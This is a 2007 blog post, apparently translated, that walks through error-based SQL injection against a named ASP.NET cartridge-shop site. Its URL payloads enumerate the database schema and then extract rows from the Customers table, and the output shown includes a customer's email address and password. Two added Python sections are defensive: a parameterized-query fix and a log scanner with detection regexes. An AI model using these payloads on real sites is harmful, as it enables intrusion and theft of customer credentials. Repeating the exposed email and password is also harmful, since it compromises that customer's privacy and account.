
Thursday, December 13, 2007, 6:42 PM
ASPX Sql Injection :D
http://bestcatridges.com/catridges/ProductsDetails.aspx?Productid=6
That website is just for the example, hehehe
Let's start.
First, delete the number 6 and replace it with
convert(int,(select top%201 table_name from information_schema.tables where table_name not in ('')))
so it becomes:
http://bestcatridges.com/catridges/ProductsDetails.aspx?Productid=convert(int,(select top%201 table_name from information_schema.tables where table_name not in ('')))

Then an error like this will appear:

Line 17: Dim strSql As String = "select * from products p join Subcategories S on p.subcategoryid=s.subcategoryid join companies Cm on s.companyid=Cm.companyid " & _
Line 18: "join Categories Ct on Ct.CategoryId=Cm.CategoryID and P.ProductID=" & Me.ViewState("ProductID")
Line 19: Dim dt As DataTable = GetDataTable(strSql)
Line 20: dlProductsDetails.DataSource = dt
Line 21: dlProductsDetails.DataBind()


Source File: E:\kunden\homepages\44\d154012135\catridges\ProductsDetails.aspx.vb Line: 19

Stack Trace:

[SqlException (0x80131904): Syntax error converting the nvarchar value 'Categories' to a column of data type int.]
System.Data.SqlClient.SqlConnection.OnError(SqlException exception, Boolean breakConnection) +857370
System.Data.SqlClient.SqlInternalConnection.OnError(SqlException exception, Boolean breakConnection) +734982
System.Data.SqlClient.TdsParser.ThrowExceptionAndWarning(TdsParserStateObject stateObj) +188
System.Data.SqlClient.TdsParser.Run(RunBehavior runBehavior, SqlCommand cmdHandler, SqlDataReader dataStream, BulkCopySimpleResultSet bulkCopyHandler, TdsParserStateObject stateObj) +1838
System.Data.SqlClient.SqlDataReader.HasMoreRows() +150
System.Data.SqlClient.SqlDataReader.ReadInternal(Boolean setTimeout) +214
System.Data.SqlClient.SqlDataReader.Read() +9
System.Data.Common.DataAdapter.FillLoadDataRow(SchemaMapping mapping) +156
System.Data.Common.DataAdapter.FillFromReader(DataSet dataset, DataTable datatable, String srcTable, DataReaderContainer dataReader, Int32 startRecord, Int32 maxRecords, DataColumn parentChapterColumn, Object parentChapterValue) +153
System.Data.Common.DataAdapter.Fill(DataTable[] dataTables, IDataReader dataReader, Int32 startRecord, Int32 maxRecords) +283
System.Data.Common.DbDataAdapter.FillInternal(DataSet dataset, DataTable[] datatables, Int32 startRecord, Int32 maxRecords, String srcTable, IDbCommand command, CommandBehavior behavior) +221
System.Data.Common.DbDataAdapter.Fill(DataTable[] dataTables, Int32 startRecord, Int32 maxRecords, IDbCommand command, CommandBehavior behavior) +162
System.Data.Common.DbDataAdapter.Fill(DataTable dataTable) +107
BestCatridgeDAL.GetDataTable(String strSql) +60
ProductsDetails.BindProductDetails() in E:\kunden\homepages\44\d154012135\catridges\ProductsDetails.aspx.vb:19
ProductsDetails.Page_Load(Object sender, EventArgs e) in E:\kunden\homepages\44\d154012135\catridges\ProductsDetails.aspx.vb:10
System.Web.UI.Control.OnLoad(EventArgs e) +99
System.Web.UI.Control.LoadRecursive() +47
System.Web.UI.Page.ProcessRequestMain(Boolean includeStagesBeforeAsyncPoint, Boolean includeStagesAfterAsyncPoint) +1061
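The error page above shows the root cause: on Line 17/18 the request-controlled `ViewState("ProductID")` is concatenated straight into the SQL text, and the detailed error (`customErrors` not switched on) echoes the result of whatever expression the database evaluated. The following Python block is an added example, not code from the original post or the site it describes. It uses an in-memory SQLite database with constructed rows as a stand-in for the SQL Server schema (SQLite has no `convert(int, …)`, so the demo shows the same defect with a plain arithmetic subquery), and the function and table names are assumptions. It places the concatenating query beside the hardened form: allow-list validation of the id followed by a bound parameter.

```python
import sqlite3


def make_demo_db():
    """In-memory SQLite stand-in for the site's SQL Server schema (constructed data)."""
    conn = sqlite3.connect(":memory:")
    conn.executescript(
        """
        CREATE TABLE products  (ProductID INTEGER PRIMARY KEY, Name TEXT, Price REAL);
        CREATE TABLE customers (CustomerID INTEGER PRIMARY KEY, EmailAddress TEXT, Password TEXT);
        INSERT INTO products  VALUES (6, 'Toner cartridge', 19.99);
        INSERT INTO customers VALUES (1, 'alice@example.test', 'not-a-real-password');
        """
    )
    return conn


def product_query_unsafe(conn, product_id_param):
    """Same construction as Line 17/18 of the error page: the request value is
    concatenated into the SQL text, so whatever it contains is parsed as SQL."""
    sql = "SELECT Name, Price FROM products WHERE ProductID=" + product_id_param
    return conn.execute(sql).fetchall()


def parse_product_id(raw):
    """Allow-list validation: a product id is a short string of ASCII digits, nothing else."""
    if not (raw.isascii() and raw.isdigit()) or len(raw) > 9:
        raise ValueError("ProductID must be a positive integer: %r" % raw)
    return int(raw)


def product_query_safe(conn, raw):
    """Validate first, then bind the value as a parameter so the database never
    sees request-controlled text as part of the statement."""
    product_id = parse_product_id(raw)
    return conn.execute(
        "SELECT Name, Price FROM products WHERE ProductID=?", (product_id,)
    ).fetchall()


if __name__ == "__main__":
    db = make_demo_db()
    # Under concatenation an expression in place of the id is evaluated by the database
    # (1 customer + 5 = 6, so the product row comes back)...
    print(product_query_unsafe(db, "(SELECT count(*) FROM customers)+5"))
    # ...while validation plus binding rejects it before it reaches the database.
    try:
        product_query_safe(db, "convert(int,(select 1))")
    except ValueError as exc:
        print("rejected:", exc)
```

The same two changes apply to the VB.NET in the error page: parse `Me.ViewState("ProductID")` with `Integer.TryParse` and pass it as a `SqlParameter` rather than building `strSql` by string joining. Independently of the query fix, setting `<customErrors mode="On">` in web.config stops ASP.NET from returning the SQL exception text and source path to remote clients, which is what turns this bug into a data-reading channel.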

Now, the text I put in bold, 'Categories', is the first table on that website. Copy it, then paste it between the '' that follow the words not in, so it becomes:

http://bestcatridges.com/catridges/Products.aspx?prodid=convert(int,(select top%201 table_name from information_schema.tables where table_name not in ('Categories')))
The error becomes:
[SqlException (0x80131904): Syntax error converting the nvarchar value 'Companies' to a column of data type int.]
Now copy that one too and paste it after Categories, adding a , before pasting,
so it becomes not in ('Categories','Companies')))
Just keep going until you reach the table you need; for example, I'll just use the Customers table :D
OK, once you get an error like this:
[SqlException (0x80131904): Syntax error converting the nvarchar value 'Customers' to a column of data type int.]
we change the SQL injection to
convert(int,(select top%201 column_name from information_schema.columns where table_name='Customers' and column_name not in ('')))
so it becomes:

http://bestcatridges.com/catridges/Products.aspx?prodid=convert(int,(select top%201 column_name from information_schema.columns where table_name='Customers' and column_name not in ('')))
Then an error appears that gives a value; paste it between the '' inside the parentheses after not in ('')))
until the data you need is complete.
Say I only need the email and password,
OK,
can do :D
replace the SQL with:
convert(int,(select%20top%201%20convert(%20varchar,isnull(convert(varchar,CustomerID),'NULL'))%2b'|--|'%2bconvert(varchar,isnull(convert(varchar,EmailAddress),'NULL'))%2b'|--|'%2bconvert(varchar,isnull(convert(varchar,Password),'NULL'))%20from%20Customers%20where%20CustomerID%20not%20in%20('')))
so it becomes:
http://bestcatridges.com/catridges/Products.aspx?prodid=convert(int,(select%20top%201%20convert(%20varchar,isnull(convert(varchar,CustomerID),'NULL'))%2b'|--|'%2bconvert(varchar,isnull(convert(varchar,EmailAddress),'NULL'))%2b'|--|'%2bconvert(varchar,isnull(convert(varchar,Password),'NULL'))%20from%20Customers%20where%20CustomerID%20not%20in%20('')))

There, you can see the email and password :D
Syntax error converting the varchar value '1|--|factorh@yahoo.com|--|factorh' to a column of data type int.

That's it, now just take it further yourself :D
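The walk described in this post leaves a distinctive trail in the web server log: a numeric parameter that suddenly carries `convert(int,` and `information_schema` text, a growing `not in (...)` list, and a run of HTTP 500 responses from one client. The following Python block is an added example (not part of the original post): it scans constructed IIS W3C-style log lines, URL-decodes the query string, flags the indicator patterns, and reports clients that repeated the schema-enumeration probe. The log format, field layout, indicator regexes and thresholds are assumptions.

```python
import re
from collections import Counter
from urllib.parse import parse_qs, unquote

# Constructed IIS W3C-style log lines: date time c-ip cs-method cs-uri-stem cs-uri-query sc-status.
# Query strings are URL-encoded as they would be in the log (no literal spaces).
SAMPLE_LOG = """\
2007-12-13 18:40:01 203.0.113.7 GET /catridges/ProductsDetails.aspx Productid=6 200
2007-12-13 18:41:10 203.0.113.7 GET /catridges/ProductsDetails.aspx Productid=convert(int,(select%20top%201%20table_name%20from%20information_schema.tables%20where%20table_name%20not%20in%20(''))) 500
2007-12-13 18:41:35 203.0.113.7 GET /catridges/ProductsDetails.aspx Productid=convert(int,(select%20top%201%20table_name%20from%20information_schema.tables%20where%20table_name%20not%20in%20('Categories'))) 500
2007-12-13 18:42:02 203.0.113.7 GET /catridges/ProductsDetails.aspx Productid=convert(int,(select%20top%201%20column_name%20from%20information_schema.columns%20where%20table_name='Customers'%20and%20column_name%20not%20in%20(''))) 500
2007-12-13 18:43:00 198.51.100.9 GET /catridges/ProductsDetails.aspx Productid=12 200
"""

# Indicator patterns (assumed); matched against the decoded query string, case-insensitively.
INDICATORS = {
    "type_conversion_probe": re.compile(r"\bconvert\s*\(\s*int\s*,", re.I),
    "schema_enumeration": re.compile(r"\binformation_schema\.(tables|columns)\b", re.I),
    "not_in_walk": re.compile(r"\bnot\s+in\s*\(", re.I),
}


def parse_line(line):
    """Split one log line into fields; returns None for lines that do not fit the layout."""
    parts = line.split()
    if len(parts) != 7:
        return None
    _date, _time, ip, _method, stem, raw_query, status = parts
    return {"ip": ip, "stem": stem, "raw_query": raw_query,
            "query": unquote(raw_query), "status": int(status)}


def classify(entry):
    """Return the list of indicator names that fire on this entry."""
    hits = [name for name, rx in INDICATORS.items() if rx.search(entry["query"])]
    # Field-level check: on this endpoint the id parameter should be a plain integer.
    for value in parse_qs(entry["raw_query"]).get("Productid", []):
        if not value.isdigit():
            hits.append("non_numeric_id")
    return hits


def scan(log_text):
    """Yield (client ip, status, indicators) for every suspicious line in the log."""
    findings = []
    for line in log_text.splitlines():
        entry = parse_line(line)
        if entry is None:
            continue
        hits = classify(entry)
        if hits:
            findings.append((entry["ip"], entry["status"], hits))
    return findings


def enumeration_sources(findings, threshold=2):
    """Clients that sent at least `threshold` schema-enumeration probes: the iterative
    table/column walk described in the post is a series, not a single request."""
    counts = Counter(ip for ip, _status, hits in findings if "schema_enumeration" in hits)
    return sorted(ip for ip, n in counts.items() if n >= threshold)


if __name__ == "__main__":
    found = scan(SAMPLE_LOG)
    for ip, status, hits in found:
        print(ip, status, ", ".join(hits))
    print("enumerating clients:", enumeration_sources(found))
```

Pairing the `non_numeric_id` check with a 500 status is the cheapest signal: a legitimate user never sends a non-integer product id, and the application only throws when the injected expression reaches SQL Server. The indicator regexes are deliberately narrow to the technique in this post; a production rule set would decode twice (for double-encoded input) and cover other dialect-specific conversion functions as well.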
 
posted by Elang Blog